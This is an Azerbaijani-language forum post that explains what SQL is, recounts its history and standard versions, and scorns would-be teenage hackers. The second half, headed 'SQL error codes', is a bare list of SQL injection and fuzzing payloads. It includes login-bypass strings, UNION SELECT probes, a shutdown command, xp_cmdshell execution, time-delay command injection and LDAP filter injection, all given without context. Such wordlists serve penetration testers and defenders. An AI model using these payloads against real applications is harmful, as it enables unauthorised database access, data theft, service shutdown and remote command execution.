Arxivimdən tapmışam dəqiq bilmirəm kimə aiddir bu 1 ildən artıqdırdki məndədir bu məlumat.Kimin əl yazmasıdırsa üzrlü hesab etsin bilmirəm kimindir.
Gəlin tez tez rastalşdığımız söz olan SQL in nə olduğunu aydınlaşdıraq.
SQL in açılışı - Structured Query Language kimidir, yəni strukturlaşdırılmış sorğu dili.
Bu dil nə üçündür və harda istifadə olunur,Sorğuları harda yazmaq lazımdır ?
-SQL dili verilənlər bazasındakı cədvəllər,məlumatlar üzərində əməliyyatlar aparmaq üçün dildir.
Bu dildə sorğular ilə biz Verilənlər bazası,Cədvəllər yarada,mümkün cədvəllər üzərində əməliyyatlar(yeni məlumatların cədvələ daxil edilməsi,məlumatların cədvəldən seçilməsi,silinməsi,dəyişdirilməsi və.s)apara bilərik.Bu dil Verilənlər Bazası İdarəetmə Sistemlərində (VBİS) istifadə olunur və bütün sorğular da burda müvafiq yerlərdə yazılır və icra olunur.
Azərbaycan İnternet aləmində 14-15 yaşlı uşaqlar (böyüklər də var) kompüter arxasına oturan kimi deyirlər mən hacker olmaq istəyirəm və tez tez rast gəldikləri SQL injection sözünün bir hacking üsulu,dili və yalnız bu məqsədlə istifadə olunduğunu güman edirlər.Lakin indi belələrinə aydın oldu ki SQL Verilənlər Bazasını İdarə etmək üçün yaradılmış bir dildir.SQL injection isə VBİS ləri aldadan sorğular göndərməklə məlumatların əldə edilməsi üsuludur və burdakı sorğuların çoxu SQL in standart sorğularını məqsədi ilə üst üstə düşməyir və standart şablon şəkildə aparılır.Məsələn SQL injectionda column sayı tapmaq üçün order+by+1+2+3+4 və.s yazılır.Bunu yazanlar çoxu heç bilmir order by SQL in ANSI tərəfindən qoyulmuş standartlarında verilmiş cədvəldə verilmiş sütuna görə nizamlama aparmaq üçündür.
Qisaca olaraq SQL in yaranma və inkişaf tarixinə nəzər salaq.
1970 ci ilin əvəllərində İBM tərəfindən eksprement üçün IBM SYSTEM R adlı VBİS və sonra bu VBİS də Verilənlərin emalı üçün xüsusi SEQUEL (Structured English Query Language) dili yaradıldı.Bu dil çox effektiv olduğundan artıq 1986 cı ildə ANSI (American National Standards Institute) ilk standartı qəbul olundu və dilin adı SQL olaraq dəyişdirildi.
Bundan sonra da SQL dilinin standartlarına yeni funksiyalar əlavə olunmaqla və.s dəyişikliklər edilməklə bir neçə dəfə Dəyişdirildi :
1986 da SQL-86 (və ya SQL-87)
1989 da SQL-89 ( FIPS 127-1)
1992 də SQL-92 (SQL2, FIPS 127-2)
1999 da SQL:1999 (SQL3)
2003 də SQL:2003
2006 da SQL:2006
2008 də SQL:2008
Hal hazırda SQL dili Bir Çox VBİS lərdə istifadə olunur.Məsələn: Oracle,MYSQL,MS SQL Server.
Lakin bəzi VBİS lər SQL in standartlarından yox onun cüzi formada dəyişdirilmiş formasnında istifadə edirlər buna SQLin dialektləri deyilir.Məsələn: Oracle da PL/SQL olduğu kimi.
SQL XETA KODLARI
Kod:
'
"
#
-
--
' --
--';
' ;
= '
= ;
= --
\x23
\x27
\x3D \x3B'
\x3D \x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
';shutdown--
<>"'%; )(&+
' or ''='
' or 'x'='x
" or "x"="x
') or ('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%; )(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
